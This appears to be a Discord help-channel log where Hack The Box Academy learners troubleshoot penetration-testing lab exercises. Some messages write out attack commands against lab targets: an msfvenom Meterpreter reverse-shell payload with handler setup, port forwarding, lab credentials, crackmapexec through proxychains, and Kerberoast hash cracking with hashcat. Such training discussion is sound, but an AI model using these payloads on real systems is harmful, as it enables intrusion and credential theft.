#modules

Actually there is something here that I don't understand

Is the path : "/usr/share/metasploit-framework/modules/exploits/" is the correct one?

Are you reloading msf?

yeah

You can DM if you'd like so I can see your inputs and outputs.

I forgot I had a sub and now I have 1k cubes, most recommended skill path?

Hello i need a help with the updated part of Login brute forcing. Hydra alwais thell me all children were disabled due too many connection errors. can anyone help me?

Are you targeting the correct port?

yes

Which updated sections are you talking about?

Login Forms and Custom Wordlist

You can DM what you are trying.

ok Tank you

hi folks

I am working on the Commands Obfuscation exercise. I am pretty sure my command is correct. I get no errors but I also not getting any result. I am using base64 and replacing spaces with %09

Can I ping someone to get a second pair of eyes on my encoding?

Use quotes?

iirc that’s a history command

If you ran cd /home

You can use cd !:1 to use the second argument of the last command(/home)

But yeah use quotes

Try what I said

The index starts at 0 btw, so u could run !:0 !:1 to do the same

Kinda cool

That’s the extent of my knowledge on that

How to get internship

Recently I completed ejpt

This is not the channel to ask

Go to #careers-and-certs If you can’t access it, read #welcome and follow the three simple steps

Hey there, I hope I'm posting in the proper sub, I did contact the support as suggested and would like to get your input on that matter if I may.

So I'm doing CDSA cert path currently and I'm at the Windows Attack and Defense (but my issues is pretty much with all the the modules anyways) . Like I was stating the other day, I'm having big time issues with connection and lags to the environment VMs, even worst when we are asked to do a RDP connection from VM A to VM B. Yesterday I spent almost 40mins battling with resizing a powershell window from a Windows VM, in order to grab the command's output, I'm not joking unfortunately. When I contacted Support they say :

I'm ***, use the Pwnbox on a closest region to us and with the US VPN

I was originally using the pwnbox but 1) I would rather prefer to use my own kali machine with all my tools , 2) I had some connection issues anyway and was thinking maybe to switch to VPN connection from my own Kali machine. So my question is, do you have issues also with the labs ? Are you using your own VM or are you using the Pwnbox ? I tried Pwnbox WEST US, VPN US , but same thing.
I'm a single dad, working all day and unfortunately with the little bit of time I have for myself, spending 30 - 40mins resizing a window is quite frustrating. I'm reaching a point where I'm starting to skip all the labs and just reading / taking notes of the lessons, but obviously this is a path to set me straight to failure.

To give some context I'm living in Canada pacific time, I have a 1gig up and down connection at home with 1ms latency average, also I've been using HTB Labs for a while now and I don't really experience any issues with the env.

I usually use the vpn over tcp

But I can’t say about that module

Haven’t done that one

Europe or US ?

Europe

Belgium

Okay, thanks for your input

When you connect to a VM, are you experiencing crazy lags sometimes ? like moving a window around with 5s latency or is it pretty smooth ?

It usually is pretty smooth

I hope someone from West Canada could give me some input, finger crossed 🙂

Again, this is Advance Obfuscation

Maybe i need to || reverse|| each command prior the base64 encoding? But not sure how to accomplish that.

try another way to use spaces

or you didnt bypass the commands like base64 or bash

not following

You mean, BEFORE encoding?

no

in this command

I think it has no spaces

what is %09

you also need to wrap the command in () not {}

thats probably the biggest part

replacing the space

Thanks. Let me take a look

worked for me

your base64 is wrong

If you need help with a payload please take it to dms

Since it's for a module above tier 0

Got it now!

https://tenor.com/view/dancing-happy-dance-happy-birthday-happy-birthday-to-you-gif-5032254444894074067

on "Kerberoasting" module, cant get the kali machine to access the RDP machine via ssh.

this is the error i am getting

This on the CDSA path, i would appreciate some help. Been stuck on this for like 3 hours and cant find anything in the forms.

that doesn't look like a kali machine

also there's no kerberoasting module? you're likely referencing a kerberoasting section within a module

it is the environment they give me for the lab

yes sorry

that's the pwnbox which is parrot

see at the top ^ parrot terminal

windows attacks and defense

yes i do

the spawn instance button spawns the pwnbox attack box, which is parrot

it's not kali

oooo, so do i have to install kali on my own machine?

no

https://academy.hackthebox.com/module/176/section/1754 read the overview of the lab setup

i have the rdp up

you ssh into the kali machine from the rdp session

in this case the target is the windows machine; and the internal kali machine is @ 172.16.18.20

according to the lab overview

as noted by the lab setup overview depends on the section

also the lab tells you that the username and password for the kali instances are kali:kali

not htb-student

according to what i'm seeing, you don't need to interact at all with the kali instance for this section

well we have to send back a file to the kali machine

i tried the other services but still no luck. im not sure if its just the wrong password or something else. i tried with the username lowercase as well

nvm i think i got it

so in the rdp, i run cmd or powershell to ssh to the kali?

you can use powershell

but again

from what i'm seeing

you don't need to connect to the kali instance at all

you run the kerberoasting attack; retrieve the hash and crack it for the svc-iam user
afterwards you connect to DC1 with htb-student (From the rdp session) - and perform the relevant eventlog lookup to discover the SID of the webservices

you can send that back to the parrot pwnbox or your own vm whichever you prefer to use

you don't need to send it over to the kali machine, the parrot pwnbox has hashcat installed

xfreerdp has the /drive: option to mount a local directory as a sharename
/drive:<name>,<path>

i am cooked idk how to send back to parrot

literally just old you above

i am trying now

this is what i got when i tried to connect to kali

i am going to try the parrot

you're doing what's known as the xy problem

https://xyproblem.info/

💔

If you're still stuck you can DM

Maybe a kali machine didn't spawn for this section

Or the internal network is a bit bugged

¯_(ツ)_/¯

Also as a note: how would you send the file over to the kali machine?

Because the methods would be analagous

its what its asking me to do

i just ate and am trying to get it to the parrot now

don't see where it's asking you to send to kali

We then need to move the extracted file with the tickets to the Kali Linux VM for cracking (we will only focus on the one for the account Administrator, even though Rubeus extracted two tickets).

We can use hashcat with the hash-mode (option -m) 13100 for a Kerberoastable TGS. We also pass a dictionary file with passwords (the file passwords.txt) and save the output of any successfully cracked tickets to a file called cracked.txt:

ah missed an instruction

¯_(ツ)_/¯

could be the internal network is being buggy

i still just do understand why this so hard lol

one command is delaying me

but how do you propose to transfer the file over to kali? ¯_(ツ)_/¯

ah there's a sharefolder that's set up [i haven't done this module]

exactly

you just put the file in the sharefolder

that's just an extra step tbh; all the tools you need are also on the parrot pwnbox ¯_(ツ)_/¯

shouldnt be this hard

sounds like the lab spawn bugged out

i suggest resetting the lab; changing vpn regions; praying to god

done it twice

have you tried changing vpn regions? this requires restarting the pwnbox as well

to test if the internal network is buggy try connecting to the DC1 ip

via the htb-student creds

wait ima try to change vpns one more time

also suggest to change completely from EU --> US

also the VPN region is NOT the pwnbox region

the vpn regions are the us/eu academy 1-6

i went to US west

that's pwnbox region

not vpn region

the vpn regions don't have a locale like US East/Central/West

vpn region is above the connect to pwnbox

the vpn region is what dictates the target spawns and things like that; the pwnbox region is solely just for the region the pwnbox spawns in for least ping relative to you so you can interact with it smoothly

i see

so i am going to change to academy 3

there's US and EU

i suggest changing completely from US to EU

i.e. instead of going from US-academy-1 to Us-academy-3 going to EU-academy-1

ok

now the rdp isnt working

i am coming back to this tomorrow

https://tenor.com/view/mad-angry-rage-gif-10666383

thank you for the help though @fathom pendant

i am going to review your points tomorrow, it will click

when you change vpn regions you need to respawn the pwnbox

and the target

Dont we all

Dm me

if you can't ask for help publicly gonna go off the assumption you want help doing something illegal

Is it illegal ?

no idea since you haven't said what you want help with

then reach out to whatever support for whatever you got hacked on

if it was your personal device that got hacked, don't download and run shady programs

this channel and server really isn't a help forum for people who got hacked

i suggest reading the #welcome and #rules

99.9999% of the time a suggestion for once you get hacked is:

• change passwords and enable 2FA if possible
• backup important files
• reinstall windows/your operating system completely

I'm really confused why jtr is detcting a hash on the pwnbox but not on my local machine with the same exact file. any ideas?

im on the protected files module in the passowrd attacks section on cpts

i need help in machine try to get the flag ..

if you need help with a machine on https://app.hackthebox.com there's #boxes channel, you need to read and follow #welcome to access

thanks, im proabably not asking this in the right spot

i think she was talking to @rustic sage

you're asking in the right channel

not sure what the issue would be between your own machine and parrot

in terms of why jtr detects one and not the other

well and pwnbox

yeah and the file has the exact same hash when i run md5sum

i didn't have any issues on my own parrot machine when i ran through this a while back

I'm using fedora on my own machine for htb, but i dont think fedora would have packages that are old

check versions

¯_(ツ)_/¯

same, 1.9

¯_(ツ)_/¯

then not sure exactly what the issue would be

r u getting any error messages on ur local machine

no, just that john couldnt detect the hash

what os is your local machine

oh you already answered this

i also don't have any of the 2john packages on this installation, im not sure how to get them either

maybe pwnbox has the jumbo version of john and your local machine doesnt

huh ok i didn't know there is a jumbo version

https://tenor.com/view/spongebob-gif-9320398

yeah that would probably be it, the jumbo version is the one with the 2john

damn tenor

just gonna do me like that

https://tenor.com/view/wumbo-patrick-star-spongebob-meme-gif-18269398

there we go

what

im clearly missing something

thank you!

click the first link that tenor failed to embed

got jumbo john working, and that fixed it completely! maybe that should be a hint or something in the module so someone else doesnt spend 2 hours trying to wonder why their version of john doesn't work bc they installed it with the package manager instead of github

well it's the defaut install for parrot and kali (which is what most people are using)

most people don't even know the john that's installed is the jumbo one

¯_(ツ)_/¯

fair enough, using fedora just means it takes a little longer to get some tools running

but then i dont need to spin up a vm to do htb

you should be doing pentesting from a vm regardless

that way you don't run into issues that would require a reinstall; better to recreate/rollback a vm than have to wipe and reinstall your own OS

not to mention you risk your own device security

¯_(ツ)_/¯

coming back after a pretty long period of not doing any practice, was wondering if it's possible to reset the filled in questions in modules?

(reset module button after clicking finish doesn't actually reset any questions)

ive heard this before, why does it risk your own device security?

i mainly don't do it from a vm so it doesn't kill my battery life

i can see that it could risk it when I start upload servers in directories with private info, which I've def done a good bit before lol

opening/closing ports
potentially exposing sensitive directories
potentially downloading/accidentally running a malicious script

yeah fair enough ive done all of those so far lmao

I've left an download server straight to my docs folder open for 2 days one time and i had a copy of my id on it

it wasn't accessed by anyone tho luckily

whenever htb introduces a new malicious script i always run it on my own pc first to see what a normal computer output would look like too

well yeah the problem you have to remember is: while connected to the vpn other users on the same server can potentially reach your machine (while there are protections in place, alongside this being against ToS you still wanna operate under beste practices)

i suggest doing it on a vm, for the same reasons as stated above too; a vm is not much different than a "normal computer"

it's just a virtualized computer environment

Hm how do you get role

by just doing basic nmap scans?

yeah its definitly a better idea to do htb on a vm

not all nmap scripts are safe, some are DDoS and some can crash given the right circumstnaces

Running malware on your host machine is a disaster waiting to happen

read and following #welcome

Thank

doing an nmap scan isn't HTB introducing a "new malicious script"

Pwnbox instances working for anyone else? Constant failing due to request validation failed

Room -> https://academy.hackthebox.com/module/77/section/843

but even still, i recommend keeping your host/daily OS as secure as possible

ctrl+shift+r to refresh the page and try again

also it's not a "room" it's a module section, room is THM speak, and we don't do that here

also try: logging out then logging back in

Should've been more verbose with my issue, I've attempted refresh several times. Changing servers, etc

otherwise; reach out to support

that's really the only other people that can help you

if it's a backend issue nothing that anyone else can troubleshoot for you

loaded fine for me

alright, i'll do my due diligence and see if i can get it working. ty for helping me on the "module section"

proper terminology is important ¯_(ツ)_/¯

Spent a lot of previous time with THM, just what I'm used to saying ¯_(ツ)_/¯
But indeed, words are important

Grammar is the difference between helping your uncle, Jack, off a horse, and helping your uncle Jack off a horse.

it helps prevent future situations where you don't specify and someone asks "what do you mean by room?"

mb i was more wondering how users on the vpn find other users on it, and how there are protections in place

im just curious

when you run the vpn connection you connect to an endpoint server and are assigned a 10.10.0.0/16 IP if i'm recalling correctly; while HTB can do some gateway stuff on the vpn server, it's not gonna stop someone determined enough to work around it

I mean thats basically what hacking is: being determined enough to break something and make it do things you want it to do that are unintended

A newbie given enough time and having enough determination could hack an insane machine

Hi, my name is Tammy and I am new to HTB. I am trying to do one of the machines and I know how to secure shell into it but there's no response. I can ping it but it won't connect.

I am trying to copy and paste a screenshot.

I am not even sure I am in the right chat.

what machine are you trying to do?

Escape2

there is a channel for that, #1327698295102898246 , if you cant access it read #welcome to become verified and gain access

but also, im 99.999% sure escapetwo didnt have ssh enabled. You can only ssh into a machine if it has ssh running.

ok, thank you. Then how am I supposed to work in the machine? Lol

It doesnt it got winrm/rdp

its a windows active directory box, specifically a domain controller, you can interact with services like kerberos, smb, winrm, ldap, e.t.c. if you don't know what any of those terms mean you should do some research on active directory and learn about it

its going to be very difficult to hack into something you dont understand at all

ok, I need to review before I try this box then

Not review, study

You're right!

And I will

hackthebox academy has a very well made module on active directory if you are interested

several* ad modules

Here's the one tool you need to study a lot of for AD: netexec

it will basically take you from 0 to being able to do medium ad boxes

from intro to ESC's

oops ye, but i was specifically referring to active directory enumeration and attacks

for foundations

intro to AD will be more useful basic foundation

true

Actually I started the academy, I just need to continue it.

personally i didnt like that module, it felt like just a bunch of lists of definitions

ok

that's a LOT of the intro to X modules

I have done some

Intro to AD was fun, was a lot of theory and was pleasantly surprised by how much I could do during the labs without needing the solution(provided I've done the powershell intro module)

starting point doesn't prep you well for standard boxes imo

Tru... this why Im having to go to academy 😅

just because starting point boxes were made back in the early days of HTB, the difficulty of boxes has scaled linearly over time, where an easy box now may have been an insane box back then

I will have more time to delve into the academy this weekend.

they're good for introducing basic concepts; but overall they don't prep you for more advanced

Yeah... you're gonna need a lot more than 1 weekend

wow didnt realise there was that big of a difference

Oh, I know that but I have to start somewhere

I do it at least a section daily, I don't actually do just 1 section a day but I just tell myself I only have to do 1 section to help me get started

HTB is very different than TryHackMe

One section is a good start, it's a lot to digest at tims

times

HTB throws you into the deepend really quickly with theory and then asks you to practice that theory

That's what I want

THM holds your hand a lot, HTB labs throw you in and expect you to research what you don't know

It will be good for me

academy is good at helping you visualize theory while not directly giving you answers

Asking you to research also helps your research skills which is a key skill in cybersec

I like that way of learning

my biggest tip is, and always will be, (aside from take notes) be able to think critically

sometimes you have to make leaps of logic

good to know

because sometimes it is a case of "wow, the admin is that stupid"

Lol

i.e. the root rsa key and the user rsa key being the same

Yes, that is not good

but a lot of what you'd find in the real world is surprisingly dumb

I have done a lot of rooms on TryHackMe and taken a ton of notes but you're right, they do hold your hand a lot so I haven't retained as much as I would like to.

HTB certifications are at lease noticed by employers

i'm refactoring my notes once i get my desk set back up; biggest thing is understand why a thing is not just that it's the thing to do

not YET 😉

really?? ive always heard that they're very unknown

I just helped someone with the footprinting DNS section, i was curious how the dnsenum script actually works; found out it basically does an nslookup/dig of the wordlist.domain or wordlist.sub.domain

HTB only been around a tenth of the time their competitors, the fact that they're already this popular just says something

utilizing the provided nameserver IP

Well I have noticed different things but I am not sure as to what extent they are noticed by employers

i really hope they are more noticed by the time i start looking for a job lmao 🙏

Lol, me too

From what I understand their certifications are tough

i figured out it worked that way by doing
dig answer.to.question.domain @ip and nslookup answer.to.question.domain @ip

But I don't know for sure

they are tough but fair

its cool that it is that simple

when you get stuck and move past it or fail due to something silly you couldn't get past you know that it's an issue with you and not the course

the exams don't toss anything at you that wasn't taught in the course

Ok, I believe that. They want you to learn.

It's just putting the time and energy in to do that!

yep; it's why it's recommended to do the capstone module (Attacking Enterprise Networks) blind, spin up the target and don't answer questions until you hit domain compromise

Hmmm....there is so much more to HTB than THM!

The modules are different than the academy? Or are they part of learning paths as well?

another thing i advise people to do: is when you get an unexpected error, document how you resolved it

modules are part of academy

some are put in learning paths

That's a good point

Documenting is key

the job role paths organize a set of modules in a recommended order to do them in

I will look at that once I get past the foundations path I am on

👍

can I add you as a friend?

sorry i don't add friends (sometimes that ends in unsolicited asking for help and advice, which gets exhausting)

ok, no problem

anything that can be asked about a module section has likely either already been asked or answered in here or has someone that can be like "yeah you just do this" in here

it's why it's recommended to say what module and section you're on; so others can utilize the handy dandy discord search feature to find info

Good point, I forgot about that as well, lol

I will be going through some modules and will write notes to ask here when I get stuck.

I downloaded the parrot OS box HTB version. I downloaded the vpns and when I went to get on my box tonight, neither downloads were there. Why is that

you need to download the vpn inside your vm

also make sure you're booting into the os and not the iso

(you'll need to dismount the iso after doing the try/install process)

how do I dismount it?

depends on the hypervisor, but should be able to from settings

This is a pain in the ASS!!! LOL

you only have to do it once 😄

I am going to have to look up how to do that. But is HTB version the right iso to download?

any version of parrot will work

Lol

there's nothing special about the HTB edition

Maybe I will uninstall it and then reinstall a different version then

i mean, why?

no matter how you slice it the steps would be the same

you'd still need to dismount the iso after installing

Cause I am new to a lot of this so I don't really have a great understanding of it all yet

If you have booted correctly into the vm and can use it, then just download the vpn inside the vm

sometimes (a lot of the time) virtualbox prioritizes booting off the optical drive (iso) over the virtual disk

I did but when I restarted the machine the downloads weren't there

wellll... did you put them in the temp directory?

if you saw try/install when you booted it back up, it's still launching into the iso

seems very strrange that it should do that if it has a valid virtual disk

they were in the downloads dir

that's literally what i'm trying to say

boot order priority

it sets the optical disk > virtual disk

which I did

it's on the virtual disk, so I need to dismount it

if you still see try/install when you load up the vm, it's still loading into the iso

it is

so you need to dismount the optical drive; which can be done from the virtualbox settings

and restart the machine

and it should boot into your virtual disk image

👍

I am looking at my settings now.

should be under Storage (virtualbox)

how do I do a screenshot

you can't share a screenshot unless you've linked your account via the method in #welcome

If anyone is struggling on confusion algorithms PLEASE use this on burpsuite, it’s way way easier https://youtu.be/ov9yT4WAuzI?si=NRwXgn1gMfwWKbP_

update burp! Follow solution 1!

we're veering off-topic i suggest creating a post in #1024429874246590575 so we're not flooding the chat

ok, I will go through the welcome thing right now

anybody can help me with this?, because i already restart the machine but when i scp chisel into the server, and start the chisel in the server. it tells me that GLIBC is not found

you need to statically compile chisel

how can i do that?

i mean you can use discord's search feature to look up the words "static compile" and that should help

okayy marcielee thanksss for the info

did u check the entire list

some of them will execute

Module: Using Crackmapexec
Section: Stealing Hashes

Chisel just doesnt want to work for me tonight,can anyone do a sanity check and see if I am doing this wrong?

sudo chisel client 10.129.55.142:8080 socks
2025/01/23 23:49:05 client: Connecting to ws://10.129.55.142:8080
2025/01/23 23:49:05 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2025/01/23 23:49:05 client: Connected (Latency 28.785871ms)

I then run the command and get nthing back
proxychains4 -q crackmapexec smb 172.16.1.10 -u grace -p Inlanefreight01! --shares

verified /etc/proxychains.conf and /etc/proxychains4.conf show
socks5 127.0.0.1 1080

Any clue why I cant get scans through chisel?

try with sudo

Holy crap I am dumb lol

Worked, thanks

also use netexec instead of crackmapexec as cme is no longer maintained

Thanks!

anyone can help me to do this 2nd task in LOCAL FILE INCLUSION IN (Basic Bypasses)

https://academy.hackthebox.com/module/23/section/1491

as stated by the question it uses multiple filters, the lfi module likes to build upon previous section knowledge, so try combining techniques

Hey guys, can someone help me with this: Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable. https://academy.hackthebox.com/module/21/section/128 . I have been working on it for ages and still no result, no resources could help me. I would really appreciate if someone could direct me

i mean the instructions are fairly clear

for this module HTTP Attacks and exercise Exploitation of Request Smuggling , is the vulnerability a CL.TE vulnerability? i'm having a difficult time following this page. All of the steps show a CL.TE for practice, and so far the practice and the exercise match for the most part during the rest of the module.

there are a few considerations to make when you read the instructions that

1. there are multiple steps involved

• encode the var 28 times
• the salt (which is used further down the line) is the length of var

2. sometimes new-lines can get counted as a character
3. The answer isn't the length of the var, it is the output of the script after you've successfully created the loop

thank you very much, i will try that

in the future try not to just screenshot the question; include

• what you've tried
• what you think you should be doing
• the module and section name

avoiding spoilers where possible

if you get any errors, those also help with understanding what you might be stuck on

Alright, I will keep that in mind, thanks for helping me!

Creds: Authenticate to <SNIP> with user "sql_dev" and password "Str0ng_P@ssw0rd!"

Sorry, it's first time that with the credentials I cannot log in and I do not understand whether it is intentional or an error;
I have tried both, RDP and WinRM

Thnks for help!

in Windows Privilege Escalation > SeImpersonate and SeAssignPrimaryToken

There are other services that you can try to authenticate to apart from WinRM, SMB, RDP and etc

It was actually shown in the section

Thanks

erm... our messages got deleted

Yeah, don't need their name or server here. For anyone curious, if someone reaches out to you to join a "HTB Support Server", do not. They are NOTHING to do with HTB.

btw can someone help me with this problem please?

that output is fine; weird that there's a 10.0.16.18, didn't think you could be assigned a 10.0.x.x ip address

maybe you mistyped

:)

i got it to work - it didnt work before as i ran it in a tty

also that's related to the Attacking enterprise networks module; which is a t2 module

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

btw, am abit worried after joining the scam channel earlier ... i didnt download anything from there - all i did was click on the dm and joined their channel and clicked on 'start a ticket' which opened a private chat with the scammer 😦

i suggest just blocking and leaving the server

i did

as long as you didn't do any 3rd party authentication your account is fine

they can't hack you just by having you join a server, they use a phishing webhook tool that basically grabs your auth token that they can use to take over your account, this type of attack also bypasses 2FA

and the phishing webhook tool has to be downloaded by the user 1st?

nope

so some websites have the ability to allow 3rd party apps, through API calls, to authenticate in order to provide some functionality.
as an example; Path of Exile 1/2, there's a popular filter creation website called filterblade, filterblade has a functionality to sign in to your Path of Exile account to sync your filter to an online folder, which prompts the "allow this app to do things" type prompt (uploading the file to the API)

I just got done with the password attacks module!

im just happy bc its a hard module imo and it took me a while

ah like 3rd party websites asking if u want to sign in with your google account?

yep

ok but what puzzles me is that in the private chat with the scammer, he asked why i dont have a node... and asked for my wallet. how would he know if i have a node or not? ?_?

he wouldn't

just a random guess

ok phew

nice! that's one of the worst considering how long it takes

Need help with info gathering subdomain bruteforcing inlanefreight.com

Use subdomain to find missing subdomain by bruteforcing. I have found the 1 not listed previously but it's not the correct answer.

Is xfreerdp the only applications that can do pth?

There's always more than one way to perform an attack

I'm talking about RDP specifically

I believe remmina has a section to put a hash, haven't touched it in a minute

Try refreshing the page, if that doesnt work. Dm me the subdomain you think it is/the command output

@fathom pendant thank you

Sometimes weird cache issues cause the answer to not accept

Also make sure you don't have an additional space

not sure if this is the correct chat, I have been doing starter modules about ffuf and I can access target machine without vpn. Should this been happening or I am understanding something wrong? thanks

If it is a Docker container (target specifies IP and port), you can access this machine from anywhere.

hi, i'm learning module NTLM Relay attacks, and i test WebDav attack in my computer.
can someone tell me, has the WinSearch Service on Windows 11 23h2 removed the Webclient Service by default? I can't really find any documentation on this, how can I determine it exactly

i don't think so also you don't need to spam your question

i believe in most cases webclient isn't even installed by default

in my vm, windows 11 23h2, its enable by default, but its stopped

then start it ¯_(ツ)_/¯

but im wanting to start it via searchConnector-ms to perform a WebDav attack

and i tried on win10, it works, but not on win11

Sorry for the noob question I have connected to the VPN and generated the target machine. How can I be sure I have done it correctly?

i mean windows 11 also, generally, just sucks

can you connect with or attack the machine in the manner described by the section?

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

ipconfig and get IP via VPN

probably no, ffuf counts errors incrementally to the requests

like this

ffuf counting errors is likely a you issue, and not a vpn issue. what module and section are you doing?

ffuf module

and section?

in the beggining, directory fuzzing

what's your syntax?

where can I read documentation about win11? does microsoft seem to only provide documentation for win10?

microsoft providing adequate documentation?

ffuf -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://ip:port/FUZZ

and you're replacing the ip:port with the spawned IP and port (this doesn't require being connected to the vpn btw)

i think not..

.

yess

copy/paste exactly from terminal to here (to copy from terminal ctrl+shift+c) and wrap in backticks so discord doesn't format it weirdly

       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://ip:port/FUZZ
 :: Wordlist         : FUZZ: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [120/87664] :: Job [1/1] :: 3 req/sec :: Duration: [0:00:52] :: Errors: 80 ::```

if you wanna do codeblock you can just
```
output
```

instead of doing it line by line

formats it rather nicely don't ya think?

i'm assuming you're redacting the IP:port you spawned

redacting? not native 😄

hiding/obscuring

yes

i found it

please don't do that

.

so why the errors?

i don't know

ook

if you actually provided the ip:port i can see if it works on my machine, worked on a fresh spawned target on my end

send that section link here

i've already done that module, i think I'll remember something

https://academy.hackthebox.com/module/54/section/485

also the module uses /opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

minor difference

I have kali on my vm where path is different

caught it immediately

seclist != dirbuster

:p

ok

i think this module has nothing to do with vpn

https://github.com/danielmiessler/SecLists

scanned from pwnbox btw, works fine

moreover just found-rw-r--r-- 1 root root 725439 Feb 27 2009 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

that's fine

it has 644 perms; meaning that anyone can read it

shouldn't matter for a program using it as a program is reading it

not writing or executing it

either way seems like it's something to do with either your environment or your ffuf install

since i was able to scan your target just fine

yes is my env just figured it out

thanks for ur time sorry for the newbie question

as a note; if the wordlist you're using has comments adding -ic tells ffuf to ignore comments

aka any lines that start with #

@subtle heron my best guess is it's something to do with your environment considering the output you shared shows 3 req/sec

which is PAINFULLY slow

yess I have configured wrong my vm

switch the networking mode from NAT to bridged or the other way around

i forget which one unclogs the drain for it

someone told me that-)

https://tenor.com/view/jake-adventure-time-sucking-sort-of-good-gif-22475109

https://tenor.com/view/everybody-start-somewhere-past-harper-glass-selma-blair-gif-16002585

anyone solved the second paart of login brute force skills assessment ? after getting SSH session I'm stck

See what other ports are open on the ssh server, and what files you can find on that machine.

i did nmap scan on the local host and knew there is FTP server but when i brute force my login to , it takes so much time if using rockyou.txt or find nothing if using the provided lists

You should look at the files already present on the machine you've ssh-ed into. You'll see that you don't need rockyou.txt

there is password file i can use but also several username lists , is it to try to make a wordlist of all of them by cupp

In the whole Login Bruteforcing module you're supposed to have, at least, heard of the tool username-anarchy, you should find a folder with that name on the server, I'll let you guess what you're supposed to do with it;

i will give it a try and see what can i get

AD Enumeration & Attacks - Skills Assessment Part I
Hello, I was curious to see how people had answered question 2: Submit the contents of the flag.txt file on the Administrator desktop on MS01.
I found some tutorials online and I'm startled to find out that everyone seems to be able to launch port forwarding through meterpreter but I can't seem to be able to do it. Here are the commands that I use:
msfconsole
use multi/handler
set lhost my_tun0_ip
set lport 9999
set payload windows/x64/meterpreter/reverse_tcp
run
Then create the payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=my_tun0_ip
LPORT=9999 -f exe -o meterpreter_reverse_tcp_9999.exe
Then, on the web shell, upload the payload and run it.
Then, I get a meterpreter shell, I run:
portfwd add -l 1234 -r||172.16.6.50|| -p 3389
And it's successful, however when I try starting an rdp session with MS01:
xfreerdp /v:localhost:1234 /u:||svc_sql|| /p:||lucky7||
It keeps failing. However, in few tutorials that I've seen, the very same commands seem to work. Can anybody help me troubleshoot this?

you may want to redact spoilers

yep sorry I didn't know you couldn't mask something in code

awesome i made a list of username by the user of incident report then brute forced his login by the passwords there and got the password

Congratulations on finishing login bruteforcing!

thanks brro for the hints

Hello, i am on footprinting lab - Hard. I am running snmpwalk -v2c -c @ my target but it is displaying a time out no response. I have reset my target twice, any ideas on where i am going wrong?

i figured it out, how would we know the community string before hand? I feel like i missed somethign on the enumeration, i just stumbled on what the community string was via onesixtyone

yo guys

im trying to install AD powershell module

as the intro into cmd suggests

it says only offical way to install it is using this command Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online

and its not working

i get this error ```Add-WindowsCapability : Cannot validate argument on parameter 'Name'. The argument is null or empty. Provide an
argument that is not null or empty, and then try the command again.
At line:1 char:46

• ... indowsCapability -Name RSAT* -Online | Add-WindowsCapability -Online

•                                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : InvalidData: (Microsoft.Dism....apabilityObject:PSObject) [Add-WindowsCapability], Param
    eterBindingValidationException
  • FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Dism.Commands.AddWindowsCapabilityCommand

welp

Can you try this one "Get-WindowsCapability -Name "RSAT*" -Online | Where-Object { $.State -eq "NotPresent" } | ForEach-Object {
Add-WindowsCapability -Name $.Name -Online
}"

i feel like its better to use foreach-object to properly loop over each capability name

gonna try rn

isnt it better to use "RSAT`*" so the PS dosent recognize the star as a part of string ?

also exception ```$.State : The term '$.State' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:62

• ... dowsCapability -Name "RSAT*" -Online | Where-Object { $.State -eq "No ...

•                                                       ~~~~~~~
  

  • CategoryInfo : ObjectNotFound: ($.State:String) [], CommandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException```

the wildcard RSAT* works as expected in the Get-WindowsCapability cmdlet

Get-WindowsCapability -Name "RSAT*" -Online | Where-Object { $.State -eq "NotPresent" } | ForEach-Object {
Add-WindowsCapability -Name $.Name -Online
}

this should do the trick

spray and pray

fingers crossed

hey guys

same exception ^

what do you get with Get-WindowsCapability -Name "RSAT*" -Online ?

State        : NotPresent
DisplayName  :
Description  :
DownloadSize : 0
InstallSize  : 0```

not present hmm

i guess i need something like sudo apt update but on powershell lol

Get-WindowsCapability -Name "RSAT*" -Online | Format-List *

do this now

right. now. doing.

same output ^

might do Get-WindowsUpdate

and update the os

not really sure, Get-WindowsOptionalFeature -Online | Where-Object {$_.FeatureName -like "RSAT*"} might work too

never had this issue tbh

last shot before attempting updates

hmm it just said.. ok

no output

but not installed

what os version are you on?

Get-ComputerInfo | Select-Object WindowsEdition, WindowsVersion

Hey guys, I am currently working on the "Unconstrained Delegation -Users" section from the kerberos attacks module. For some reason after setting everything up to obtain the hash of the DC, I get connectio messages without the ticket.

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.205.35
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.205.35
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

its a bit old build yeah

windows 10

what build

its restarting rn

i think it was something like 14xxx

hm ok

for 1809+ we could of installed it trought the settings as well

i downloaded it old on purpose since htb recommended starting with it before creating restore points and update

really

it used to be like that yh

at least in earlier versions of windows

Use the target flag

Microsoft Windows [Version 10.0.14393]

the more the windows updates, the worse it gets

https://www.microsoft.com/en-us/download/details.aspx?id=45520

install this

ooo nice

should work with the build you have

This worked! Thank you.
Is there any reason for it not working without the target flag?

It looks it will

Probably some changes either in krbrelayx or in Impacket.

Ahh y nothing wants to work today

honestly just update the os

or maybe someone else can help you with that build you are on

but im lost

Im gonna check on windows update to see what i can do

Thanks btw mate

np

hi guys

i'm doing the sql injection module end of chapter exercises

